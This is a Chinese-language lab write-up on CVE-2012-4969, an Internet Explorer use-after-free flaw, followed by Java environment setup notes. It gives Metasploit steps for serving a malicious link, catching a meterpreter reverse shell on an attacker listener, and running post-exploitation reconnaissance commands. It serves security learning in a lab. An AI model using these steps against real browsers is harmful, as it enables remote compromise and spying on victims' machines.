)
一、该漏洞的相关背景
CVE-2012-4969是一个典型的Use-After-Free(释放后重用)远程代码执行漏洞(RCE),存在于 Microsoft Internet Explorer 中。属于早期典型水坑攻击(Watering Hole Attack)利用漏洞。
影响的组件:IE的内存对象管理机制,尤其是对DOM对象的处理
攻击方式:生成恶意链接诱导目标用户进行点击
二、漏洞触发过程
此漏洞的本质是IE浏览器在释放对象后仍然继续使用该对象的指针,导致攻击者可以借此控制内存内容,具体过程如下:
1.IE浏览器在处理HTML/DOM时,会动态创建对象,例如元素节点。
2.在某些情况下对象被释放后程序仍然持有该对象的引用
3.攻击者通过“堆喷射”填充该内存位置
4.IE再次访问该对象时执行攻击者构造的数据(Shellcode)
Use-After-Free → 内存劫持 → 控制EIP → 执行Shellcode
三、漏洞复现实验过程
实验环境准备:
kali攻击机
安装java1.6.x版本的win7靶机(本实验java环境版本非常重要,如果不安装对应版本实验环境很大程度上只会出现IE浏览器崩溃但是kali无法接收到shell的情况)并建议关闭靶机的防火墙
文末会有java环境安装的指导方法
1.打开kali的msfconsole模块,在其中搜索CVE-2012-4969
search CVE-2012-4969
2.根据自己靶机的IE版本选择对应的攻击载荷,此处选择攻击载荷6
use 6
3.在msfconsole中设置监听选项
set lhost 【kali的地址】
set lport 4444
run
此时,msf会生成一个恶意链接,复制该链接并在靶机的IE浏览器内打开。
当出现以下语句后表明脚本已经成功执行,session已经成功建立。
*4.进入会话
有些情况会直接显示“ meterpreter > ” ,如果没有显示则直接回车之后逐步输入以下语句:
sessions(列出当前的所有会话)
sessions -i 1(进入会话)
至此漏洞初步利用成功。
5.后渗透阶段基础信息收集
sysinfo(查看靶机系统信息(OS、架构、主机名等)
ps(列出靶机所有正在运行的进程;截图所示为部分进程)
getpid(查看 Meterpreter shell 所在的进程 ID)
getuid(查看当前会话的用户权限)
四、java环境安装
建议访问Oracle的官方存档直接下载,以此保证文件安全且未被篡改。
安装开始之前务必记住自己的安装路径!
随后配置环境变量,具体过程如下:
1.右键点击桌面上的“计算机”图标,选择“属性”。
2.在打开的窗口左侧,点击“高级系统设置”,在弹出的“系统属性”窗口中,点击“环境变量”按钮。
3.在“环境变量”窗口的下方,找到“系统变量”区域,然后点击“新建”。
变量名:输入JAVA_HOME
变量值:粘贴JDK安装路径
4.在“系统变量”区域里,找到名为Path的变量,选中它,然后点击“编辑”。在“变量值”的最后,添加;%JAVA_HOME%\bin(注意:开头有一个英文分号,用来分隔不同的路径)。
5.最后,在“环境变量”窗口点击“确定”,在“系统属性”窗口再点击一次“确定”。然后重启计算机,保证所有路径设置有效。
6.打开命令提示符,输入:java -version,当出现如下图所示则证明环境安装成功。
